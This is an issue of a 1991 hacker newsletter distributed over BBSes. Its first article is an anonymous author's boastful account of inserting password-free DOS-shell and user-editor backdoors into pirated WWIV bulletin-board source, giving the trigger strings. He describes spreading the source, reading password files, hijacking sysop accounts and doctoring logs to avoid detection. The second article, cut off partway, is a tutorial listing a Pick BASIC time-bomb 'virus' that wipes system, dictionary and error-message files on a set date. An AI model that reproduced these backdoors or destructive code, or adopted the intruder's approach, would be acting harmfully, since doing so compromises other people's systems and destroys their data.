=======================================                T H E   N E W   F O N E   E X P R E S S                =======================================   The newsletter of the Society for the Freedom of Information (SFI)                           Electronic Edition            Central distribution site is Secret Society BBS                  (314) 831-9039, WWIVNet 3460, 24hrs ------------------------------------------------------------------------------ The publisher, SFI, distribution site(s), and authors contributing to the NFX are protected by the Bill of Rights in the U.S. Constitution, which specifically protects freedom of speech and freedom of the press.  The information provided in this magazine is for informational purposes only, and the publisher, SFI, distribution site(s) and authors are not responsible for any problems resulting from the use of this information.  Nor is SFI responsible for consequences resulting from authors' actions.  This disclaimer is retroactive to all previous issues of the NFX. We accept article submissions of nearly any sort, about hack/phreak/anarchy/gov't/nets/etc.  Send mail to the publisher (The Cavalier) at any of these addresses: WWIVnet           [15@3460]   WWIVlink          [442@13468] VMB               (301) 771-1151. hit #, then 140. Ripco             [send mail to Silicon Avalanche] Daydream Nation   [send mail to Silicon Avalanche] Internet          [[email protected] or [email protected]] The printed edition of the newsletter is available for $14 (U.S.) per year on paper or $2 (U.S.) for a single copy.  Send mail to the New Fone Express, Jackson House Rm 206, President's Park, 10309 Senatorial Lane, Fairfax, VA 22030.  Don't forget your name and address. To download the New Fone Express, call Secret Society at (314) 831-9039 and log on as NFX, password NFX, phone# 0000, or see the distribution list elsewhere in this magazine. ------------------------------------------------------------------------------ Highlights for Issue #6/November 1991 ===================================== * "Hacking WWIV v4.12" ... by (anonymous)  (see article #1) * A Pick Tutorial Pt. 3 ... by Silicon Avalanche  (see article #2) * Six Simple Things to Do.. ... by Polekat  (see article #3) * Distribution Site List ... edited  (see article #4) * Trendwatcher ... edited  (see article #5) * Editorial ... by the Cavalier  (see article #6) ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ "Hacking WWIV v4.12"    The following is an account of a few special events that occurred in the 314 area code concerning the hacking of WWIV v4.12 bbs's. All of the events described in this article happened between 12/03/90 and 10/04/91.    With the onset of a new version of WWIV coming out, my hunger for C programming experience, and my amount of C programming language ever expanding, I dreamed about what I might add to the new source code. Coming up with some good ideas, (yes, actually useful WWIV mods) one very malicious thought crossed my mind. Something a friend of mine had gotten me thinking about earlier that day. Insert a back door into the WWIV source code, and distribute the bogus source. Ahh yes! The ultimate power! Total control of someone else's computer, that didn't know you in the slightest way! Earlier that month, Wayne Bell had just made available, to all registered System Operators of WWIV BBS software, the WWIV v4.12 source code. Since I was still running v4.07 at the time, I decided this was a good time to upgrade. WWIV v4.12, seemed to have a lot of great new features that would have required massive modification to a v4.07 source code. Upon getting my paws on a copy of the v4.12 source code, I sat down for about two and a half hours and modded away. After I finished inserting a batch upload mod, 3 things forced me to stop modding for the time being. 1) Fellow users would kill me if I called them at 2:30 AM to test a mod. 2) I wasn't sure if any of my users knew how to use Zmodem batch upload. 3) I was really hungry for about six White Castle hamburgers.    The part about the hamburgers, being the most dominant thought in my mind, pushed me to jump in the car, head down to Dorsett Rd., and grab some burgers.    While sitting in the car, eating my hamburgers, I deliberated over how I might be able to use WWIV to gain control of other unsuspecting sysops' computers.  At that moment, there in the parking lot of White Castle, at exactly 2:51 AM on 12/03/90, the ultimate hack plan hit me. I like many other unregistered WWIV sysops had obtained the WWIV v4.12 source code, illegally. Yes, a user had uploaded it to my computer. I had been considering registration, since I wanted to get my BBS on WWIVnet, and this was a requirement if your WWIV BBS was modded in the SLIGHTEST way.  But I thought, if it was so easy for me to get a copy of the source, just think of how many other unregistered sysops are running pirate sources that they modded too! The only thing that stood in my way of modifying and distributing a pirate source code was PKZIP v1.10 authentic verification. When you unzip an original unmodified v4.12 source, a -AV will appear next to every file, and at the end, the message: 'Authenticity Verifies! Wayne Bell (UJK765).' Well, if I modified any of the source files, and put them back in the zip, the message would be more along the lines of: 'Authenticity Verification Failed! Contact the author' or some BS like that. Deciding that I wouldn't worry about this problem for now, I began to write my back door into the v4.12 source. Any dummy with an ounce of knowledge of C could have done it, I was surprised that I hadn't ever heard of it being done before.  Nonetheless, I started out where all the //<COMMAND> sysop utility commands are written in to the main source file.    The idea that hit me was to create a secret WWIV dos shell command that didn't ask for a system pw. The command, like most 'special' commands in WWIV would begin with a // preceding it, and would work when entered at the main menu. It would have to be a code, that didn't even remotely look like anything to a normal user. The code would need to look like an intricate line of C programming.  These two characteristics were required because, first, and most important, I didn't want the code to be anything 'guessable.' Secondly, it had to be 'hidden' from someone who might be paging through the programming code. Strolling through the WWIV C code, I found a nice, unguessable, line that would perfectly suit my needs. The line read as follows: //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD    Upon deciding that this would be my secret shell to dos code, I scrolled up to the //DOS function, to find out what made it work, and what asked for the system password (SY:) before the shell occurred.    After block copying the programming code that came after //DOS, (the dos shell activation programming code) and strategically placing it after my //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD code so it would be activated when the // code was entered, I was ready to compile it and test it out on my own system. After a few error corrections, time wasting errors like leaving off a '{' or something stupid like that, I achieved a BBS.EXE that to everyone, except myself would look perfectly ok to run a WWIV BBS on. I replaced my normal BBS.EXE with this new one, and activated BBS.COM(to load everything up). After using space+f to fast log on to my account, at the main prompt, I entered the // code. I was immediately elated with happiness to see that I had been abruptly thrown into a DOS shell.  I didn't even get asked for a system password. It was great! Since I was in such a good mood, I decided to add one more // code into the BBS. This next code would activate the user editor. Once I had begun using my back door, on other BBS's, I realized that the User Editor back door wasn't worth crap, since you have to have a 255 SL to be able to read passwords, and you can't give out anymore access than you have. But, at the time that I programmed in the User Editor back door, I wasn't thinking about this.    The next line details the code that activated the user editor. Again, it was a far strung out code that no one would guess, looked like a line of C, and was entered from the main menu prompt. //SPRINTF(S1,%SUSER.IEND++261          Upon entry of this code, there is an instruction in the source to activate a function called data(). Data() was a copy of void uedit() that I had renamed, void data(), and stuck into the VOTEEDIT.C file. After entering this code in, I was able to page through all of the user accounts, and see whatever info I wanted to see, except passwords! I didn't realize the check for a 255 SL upon password display until the source was distributed, so for the most part, the user editor back door was useless.    Even if the uedit backdoor didn't do anything except display personal info, I still had the most powerful weapon programmed into the code, the DOS back door.    When I was finished with the bogus source, and felt that it was ready to be distributed, I zipped it down, and placed it on my BBS for download. About four months went by, and I forgot about the whole thing. As a sysop, I didn't call out a whole lot, so I didn't know what BBS's might have the source, furthermore, since I had forgotten about it, I didn't care. One day, my friend who originally came up with the wonderful idea, called me with a supreme amount of excitement in his voice. When I had programmed in the back doors, I had given him a copy of the codes, and what they would do. At that time, he seemed rather passive about it, and so was I. For some reason, both of us didn't think anything would ever come of it. Anyway, he had called to tell me that he had logged on to a modified, unregistered WWIV v4.12 BBS, and he had typed in the back door code for the user editor, and much to his amazement, it worked!    I'm sure many of you reading this, were familiar, or at least heard of something called NGNet. It stands for Neat Guys Net (if that tells you anything).  Well, NGNet only expanded out to about six or seven BBS's, at the height of its popularity, but one odd thing about all these BBS's, is that they all looked EXACTLY alike, and I mean EXACTLY.  All of them had the SAME modified pirated WWIV v4.12 source code. It was a hacker's dream come true. To have total control of a whole slew of BBS's, on their own network. It turns out, that the originator of NGNet, whose name I do not know, somehow got a copy of the source code that I had modified. He then, not knowing that there was a back door in the source, modified it to his liking.  After this, he gave a copy of the modified BBS.EXE to the other BBS's that were in NGNet. Almost all of the BBS's in NGNet, being run by bullshit sysops that didn't know crap about source modification, immediately switched to this new BBS.EXE with the mods that the originator of NGNet had installed, and which back door mod was in too.    The first BBS that I used the DOS door on, was The Mysterious Land of A&F. It worked flawlessly, and with my extra knowledge of WWIV password storage, I knew right where all the info I needed was. Since I was in DOS, I made my way to the \WWIV directory. By typing the CONFIG.DAT file, I was granted, along with a lot of garbage characters, the system password. After activating my printscreen key to send that password to the printer, I wasted no time in making my way into the \WWIV\DATA directory. Here I typed the USER.LST file.  Among all the garbage that filled my screen, a few key numbers and one word caught my attention. The numbers were the last four digits of the sysop's phone number, and the key word was the sysop's password! Now, armed with the system password, the sysop's personal password, and the last four digits of the sysop's phone number, nothing could stop me from taking complete control of the BBS! After issuing exit, and a carriage return, I was soon back in WWIV. I quickly logged off, and began to dial that very very Mysterious Land of A&F again. This time, instead of logging on as a normal account, I put in all the sysop's info, and soon I was on the BBS via the sysop's account. I was curious as to what Mysterious secrets the Land of A&F held, so I began to look around.  A quick trip into the transfer area revealed some shocking news about the sysop, and the type of BBS he ran. Dropping back to the main menu, I requested a list of the message bases via the '*' command. The first message base that caught my eye, and for the moment, piqued my interest, was the NGNet Sysops' Discussion Net. Scanning through the messages, I noticed, what I had assumed about the NGNet BBS's. Most of the sysops were, or acted like they were no older than 15 years old. So many of the messages on this sub were so worthless, things like "Hey guys....how do you like my new macro" and "Do any of you other NGN bbs's out there have any new porno GIFS you could upload to my board?" This kind of crap is the pointless childish bullshit that I try to avoid when I call out, let alone when I go seriously hacking. Anyway, after reading these discouraging messages, I became extremely uninterested in the message bases. I then, shelled down to dos, this time using the legit //DOS command, and the system password. After looking around for a while, and finding some more incriminating evidence about the sysop, I got kind of bored. Since I felt that it would be nice to keep this BBS under my thumb, I needed to edit the daily sysop log files, so the sysop wouldn't realize someone had been there, under his account.  After some copying, downloading, uploading, and overwriting of files, the edited sysop log files were in place, and I felt at ease about the whole thing. My terminal program displayed that I had been on the BBS for 38 minutes. I was tiring fast, as in order for the sysop not to see me, I had to do this at 3:15 AM, so I logged off and went to bed. As time went on, my friend and I noticed, and hacked into all the BBS's that were on the NGNet. We even did a few that weren't on the net, and had just picked up a copy of the bogus source floating around. All in all, it was an incredible feat to be accomplished, but, with the help of some extremely stupid sysops who failed to look for Authentic Verification when they unzipped their pirate source codes, it was very possible. I suppose there is some kind of morale to this story, that being that you should probably register WWIV if you want to mod the source, but I won't go too far into that. A Few Side Notes    Of all the time I spent hacking at the NGNet bbs's, I think I spent the most time on Land of A&F. That bbs, and Quality Connection, interested me most.  Of course, with all this hacking, it had to happen. I screwed up a few times.  Never did I mess up so bad, that the sysop totally found out about what was going on, but I did make a few mistakes. One time, when I was on Land of A&F, I forgot to edit the sysop's name (I had logged on under his account) out of the 'last few callers' file. Amazingly, Awesome A, the sysop of A&F, didn't catch it. Another time, I had copied all of Mr. Quality's (sysop of Quality Connection) bbs passwords off his hdd via the back door in Quality Connection.  Mr. Quality had sysop access at Land of A&F, so of course, I had to check things out from his account, even though I knew it all would be the same. I was getting kind of lazy, and one time I didn't really feel like doing all of the log file editing, so I just logged off. A few days later, I intercepted a message on the NGNet Sysop Discussion Sub (while on under the sysop's account) that Awesome A had posted.  It alerted all the NGN bbs's of a hacker that logged on to Land of A&F under Mr. Quality's account.  Of course, none of those dumbshit NGNet sysops even thought there might be something wrong with their source code, or EXE file. With Mr. Quality's other passwords, I gained total control over a few bbs's that didn't even have the back door in them, but where Mr. Quality had sysop access on. I did this with Awesome A's passwords too, and at one time had total control of Too $hort's bbs, the Ghetto. Too $hort wasn't running the pirate source code, but for some reason he had given Awesome A sysop access.  From here, I copied out all of Too $hort's passwords, and used his accounts around town. It was nice to have full run over so many bbs's. Too $hort had pretty good access (90 SL) at Master Control Program, which allowed me to batch d/l from there quite often, but I never was able to get an account, on MCP, that had anything better than a 90.  I never did really get to know Too $hort beyond a dialout to his bbs, but I'll tell you one thing, I really hate the way he signs his name, Too $hort, the dollarsign, in my opinion, is really squidly.  Another good bbs, that I called quite a bit, usually under false accounts, was Secret Society. Grim stocks an excellent selection of informational text files, but he needs to upgrade to at least 2400 sometime in the near future, if he expects to keep that excellent group of users calling.    I know that many of you who read this will doubt any of what I have said ever happened, and you'd be an idiot not to unless some evidence was presented.  Yes, that's correct, the evidence IS out there. I can guarantee anyone that the modified WWIV v4.12 source is out there, somewhere still on- line ready to be downloaded off of some weak, non current pirate bbs. If you happen to see a copy of the WWIV v4.12 source, on a bbs, do an archive listing, and, if possible, an integrity check.  If it doesn't have any pkzip verification on it, then extract out the BBS.C and VOTEEDIT.C files and download them.  Load BBS.C into an editor, and do a 'string search.' Search for either one of the above // codes.  Both, the dos door, and the uedit door should be in there.  Also, in VOTEEDIT.C, as I mentioned before, there is a function in there called data().  In it is the exact same thing that was in the function uedit(). Also, another way of proof, is that you could possibly find and call an unregistered, modified WWIV v4.12 bbs and attempt to use those codes. But since v4.20 is out, I doubt many of the idiotic squid sysops that grasped on to the unverified v4.12 source will still be with v4.12, they will probably have upgraded to v4.20 now, being that their bbs's are so damn unstable.    I never did register my copy of WWIV, as my bbs went down a short time ago, and I never was able to get on WWIVnet. It was on-line for over four years, very private, but lately, I've realized the lousy condition of the hack/phreak/anarchy community, and I've just kind of lost interest in bbs'ing. I'm writing this, partly, to try and 'do my part' for the hack/phreak/anarchy community, and show the others out there that yes, there are still a few conniving, ingenious, ruthless hackers out there. I'd like to see the other true hackers out there get off their asses and do something! If you're not going to hack anymore, at least write an article about your experiences, and send it to the editor of Phrack, NFX, Digital Underground (If DU is till in publication) or any electronic publication.  Don't go around destroying systems (rm *), just hack them, and brag about it, just like the old days. Note that I never once deleted a file on any of the computers that I hacked, that I wasn't absolutely sure I would replace.                           -Disclaimer of Who I Am-    I don't really bbs too much any more, as I haven't been interested in it for quite sometime now.  Still, just to avoid any accusations, phone harassment, or any bullshit from those NGNet sysops, whom I'm sure will be extremely pissed once they hear of this, I'll be placing strict anonymity on this article. Don't come after the editor of New Fone Express, as even he won't know who I am. I'm not even sure that he'll put this in his publication. And above all, please don't be an ass and throw accusations around at other bbs'ers. I'm only slightly active on one bbs now, and if I don't call there within four days from now, I'll be deleted due to inactivity. As I mentioned before, I don't have an account on MCP any more, again, due to inactivity. I had a stable account on Secret Society, but for quite sometime, I've been deleted, yes again, due to inactivity.  I tried to keep a stable account on Angel Station, but it seemed that bbs was always crashing, and everyone would have to logon as new users.  I'm pretty sure I've been deleted on Blitzkrieg, but I have to say that that was one of the best, most stable bbs's I was ever on.  So, if you are ready to go on some hellish trek to even attempt to find me, give up now!  Don't waste your time, as I'm sure your attempt(s) will be in vain.                                             >< [TC: The best chance you have of reaching the author is to send mail to me, and I will forward it to the false account that has been set up.  Also, the author included around 30k of screen capture files from the hack itself, which I have omitted in the interests of space.] ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Pick Tutorial            A Pick Tutorial - Courtesy of Silicon Avalanche of SFI                                Installment #3 COUGH.. HACK... WHEEZE...        Hello everybody, and welcome to the latest edition of the Pick Tutorial.  This volume is a quickie (because I'm about a week past the submission deadline, and the publisher is starting to hound me), about a simple, generic Pick virus.  Let's get started, 'eh? >ED SYSPROG-PL USER-COLDSTART       TOP .   001 PQ . I   001+HVIR   001+P 001+   . FI   >ED BP VIR   NEW ITEM TOP . I   001+*   002+*   003+*   004+*   005+*   006+BREAK OFF   007+WAKEUPDATE="MM/DD/YY"       008+* In the above, replace the MM/DD/YY with a month, day and year. 009+WAKEDATEIC=ICONV(WAKEUPDATE,"DI") 010+* 011+IF DATE()#WAKEDATEIC THEN STOP 012+* Tell everybody we're here... 013+EXECUTE "BLOCK-PRINT TIME'S UP!!!! HEH HEH HEH HEH HEH HEH HEH HEH HEH..." 014+* Wipe out the SYSTEM file - lose all the accounts... 015+EXECUTE "CLEAR-FILE DICT SYSTEM" CAPTURING JUNK RETURNING MOREJUNK 016+EXECUTE "CLEAR-FILE DATA SYSTEM" CAPTURING JUNK RETURNING MOREJUNK 017+* Wipe out the MASTER DICTIONARY (MD) 018+EXECUTE "CLEAR-FILE DICT MD" CAPTURING JUNK RETURNING MOREJUNK 019+EXECUTE "CLEAR-FILE DATA MD" CAPTURING JUNK RETURNING MOREJUNK 020+* Wipe out the ERRMSG file 021+EXECUTE "CLEAR-FILE DICT ERRMSG" CAPTURING JUNK RETURNING MOREJUNK 022+EXECUTE "CLEAR-FILE DATA ERRMSG" CAPTURING JUNK RETURNING MOREJUNK 023+* Create a new LOGON banner to tell everyone hello... 024+REC='' 025+REC<1>="L(12)" 026+REC<2>="S(25)" 027+REC<3>="HYour System's been SHUT DOWN!!" 028+* Add as many lines saying whatever you want, but the last line MUST be: 029+REC<4>=+ 030+* in this case, 4 is the last line, this would be a 50 if REC<1> through 031+* REC<49> were defin
Downloaded From P-80 International Information Systems 304-744-2253

You are viewing proxied material from infinitelyremote.com. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.